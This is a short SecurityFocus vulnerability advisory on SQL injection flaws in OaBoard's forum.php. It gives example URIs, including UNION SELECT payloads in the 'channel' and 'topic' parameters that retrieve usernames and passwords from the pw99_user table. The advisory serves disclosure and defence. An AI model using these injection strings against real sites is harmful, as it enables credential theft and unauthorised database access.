Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

OaBoard Forum.PHP Multiple SQL Injection Vulnerabilities

No exploit is required.

Example URI have been provided:

http://www.example.com/oaboard/forum.php?modul=topics&channel=[SQL]
http://www.example.com/oaboard/forum.php?modul=topics&channel=-99%20UNION%20SELECT%20null,password%20FROM%20pw99_user%20WHERE%20id=1

http://www.example.com/oaboard/forum.php?modul=posting&topic=[SQL]&channel=3
http://www.example.com/oaboard/forum.php?modul=posting&topic=30%20UNION%20SELECT%20null,username,null,password%20FROM%20pw99_user%20WHERE%20id=1/*&channel=3







 

Privacy Statement
Copyright 2009, SecurityFocus